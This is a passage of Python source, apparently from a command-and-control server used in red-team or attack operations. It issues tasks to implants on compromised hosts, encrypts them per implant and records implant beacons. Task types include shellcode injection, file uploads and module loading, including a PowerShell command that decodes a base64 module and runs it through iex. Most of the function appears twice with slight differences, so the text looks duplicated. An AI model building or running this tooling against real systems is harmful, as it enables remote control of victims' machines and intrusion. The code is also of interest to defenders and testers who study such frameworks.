hostinfo[3], now.strftime("%d/%m/%Y %H:%M:%S")))
try:
print(user_command)
print(Colours.END)
except Exception as e:
print("Cannot print output: %s" % e)
if a[2].startswith("loadmodule"):
try:
module_name = (a[2]).replace("loadmodule ", "")
if ".exe" in module_name:
modulestr = load_module_sharp(module_name)
elif ".dll" in module_name:
modulestr = load_module_sharp(module_name)
else:
modulestr = load_module(module_name)
command = "loadmodule%s" % modulestr
except Exception as e:
print(
"Cannot find module, loadmodule is case sensitive!"
)
print(e)
elif a[2].startswith("run-exe Program PS "):
try:
cmd = (a[2]).replace("run-exe Program PS ", "")
modulestr = base64.b64encode(
cmd.encode("utf-8")).decode("utf-8")
command = "run-exe Program PS %s" % modulestr
except Exception as e:
print("Cannot base64 the command for PS")
print(e)
traceback.print_exc()
elif a[2].startswith("pslo "):
try:
module_name = (a[2]).replace("pslo ", "")
for modname in os.listdir(ModulesDirectory):
if modname.lower() in module_name.lower():
module_name = modname
modulestr = load_module_sharp(module_name)
command = "run-exe Program PS loadmodule%s" % modulestr
except Exception as e:
print(
"Cannot find module, loadmodule is case sensitive!"
)
print(e)
traceback.print_exc()
elif a[2].startswith("pbind-loadmodule"):
try:
module_name = (a[2]).replace(
"pbind-loadmodule ", "")
if ".exe" in module_name:
modulestr = load_module_sharp(module_name)
elif ".dll" in module_name:
modulestr = load_module_sharp(module_name)
else:
modulestr = load_module(module_name)
command = "pbind-command \"`$mk = '%s';[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(`$mk))|iex\"" % base64.b64encode(
bytes(modulestr, "utf-8")).decode('utf-8')
except Exception as e:
print(
"Cannot find module, loadmodule is case sensitive!"
)
print(e)
traceback.print_exc()
command = taskIdStr + command
if commands:
commands += "!d-3dion@LD!-d" + command
else:
commands += command
DB.del_newtasks(str(a[0]))
if commands is not None:
multicmd = "multicmd%s" % commands
try:
responseVal = encrypt(EncKey, multicmd)
except Exception as e:
responseVal = ""
print("Error encrypting value: %s" % e)
now = datetime.datetime.now()
DB.update_implant_lastseen(now.strftime("%d/%m/%Y %H:%M:%S"),
RandomURI)
return responseVal
elif RandomURI in path and not tasks:
# if there is no tasks but its a normal beacon send 200
now = datetime.datetime.now()
DB.update_implant_lastseen(now.strftime("%d/%m/%Y %H:%M:%S"),
RandomURI)
return default_response()
def newTask(path):
result = DB.get_implants_all()
commands = ""
if result:
for i in result:
RandomURI = i[1]
EncKey = i[5]
tasks = DB.get_newtasks(RandomURI)
if RandomURI in path and tasks:
for a in tasks:
command = a[2]
user = a[3]
user_command = command
hostinfo = DB.get_hostinfo(RandomURI)
now = datetime.datetime.now()
if (command.lower().startswith("$shellcode64")) or (
command.lower().startswith("$shellcode86")
or command.lower().startswith(
"run-exe core.program core inject-shellcode")):
user_command = "Inject Shellcode: %s" % command[
command.index("#") + 1:]
command = command[:command.index("#")]
elif (command.lower().startswith('upload-file')):
upload_args = command.replace('upload-file', '')
if ";" in upload_args:
# This is a SharpHandler
filename = upload_args.split(";")[1].replace(
'"', '').strip()
file_b64 = upload_args.split(";")[0].replace(
'"', '').strip()
elif "estination" in upload_args:
# This is a PSHandler
split_args = upload_args.split(" ")
filename = split_args[
split_args.index("-Destination") + 1]
file_b64 = split_args[split_args.index("-Base64") +
1]
print(file_b64)
elif ":" in upload_args:
# This is a PyHandler
filename = upload_args.split(":")[0].replace(
'"', '').strip()
file_b64 = upload_args.split(":")[1].replace(
'"', '').strip()
else:
print(Colours.RED)
print("Error parsing upload command: %s" %
upload_args)
print(Colours.GREEN)
filehash = hashlib.md5(
base64.b64decode(file_b64)).hexdigest()
user_command = "Uploading file: %s with md5sum: %s" % (
filename, filehash)
taskId = DB.insert_task(RandomURI, user_command, user)
taskIdStr = "0" * (5 - len(str(taskId))) + str(taskId)
if len(str(taskId)) > 5:
raise ValueError(
'Task ID is greater than 5 characters which is not supported.'
)
print(Colours.YELLOW)
if user is not None and user != "":
print(
"Task %s (%s) issued against implant %s on host %s\\%s @ %s (%s)"
% (taskIdStr, user, hostinfo[0], hostinfo[11],
hostinfo[2], hostinfo[3],
now.strftime("%d/%m/%Y %H:%M:%S")))
else:
print(
"Task %s issued against implant %s on host %s\\%s @ %s (%s)"
%
(taskIdStr, hostinfo[0], hostinfo[11], hostinfo[2],
hostinfo[3], now.strftime("%d/%m/%Y %H:%M:%S")))
try:
print(user_command)
print(Colours.END)
except Exception as e:
print("Cannot print output: %s" % e)
if a[2].startswith("loadmodule"):
try:
module_name = (a[2]).replace("loadmodule ", "")
if ".exe" in module_name:
modulestr = load_module_sharp(module_name)
elif ".dll" in module_name:
modulestr = load_module_sharp(module_name)
else:
modulestr = load_module(module_name)
command = "loadmodule%s" % modulestr
except Exception as e:
print(
"Cannot find module, loadmodule is case sensitive!"
)
print(e)
if a[2].startswith("pbind-loadmodule"):
try:
module_name = (a[2]).replace(
"pbind-loadmodule ", "")
if ".exe" in module_name:
modulestr = load_module_sharp(module_name)
elif ".dll" in module_name:
modulestr = load_module_sharp(module_name)
else:
modulestr = load_module(module_name)
command = "pbind-command \"`$mk = '%s';[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(`$mk))|iex\"" % base64.b64encode(
bytes(modulestr, "utf-8")).decode('utf-8')
except Exception as e:
print(
"Cannot find module, loadmodule is case sensitive!"
)
print(e)
traceback.print_exc()
command = taskIdStr + command
if commands:
commands += "!d-3dion@LD!-d" + command
else:
commands += command
DB.del_newtasks(str(a[0]))
if commands is not None:
multicmd = "multicmd%s" % commands
try:
responseVal = encrypt(EncKey, multicmd)
except Exception as e:
responseVal = ""
print("Error encrypting value: %s" % e)
now = datetime.datetime.now()
DB.update_implant_lastseen(now.strftime("%d/%m/%Y %H:%M:%S"),
RandomURI)
return responseVal
elif RandomURI in path and not tasks:
# if there is no tasks but its a normal beacon send 200
now = datetime.datetime.now()
DB.update_implant_lastseen(now.strftime("%d/%m/%Y %H:%M:%S"),
RandomURI)
return default_response()
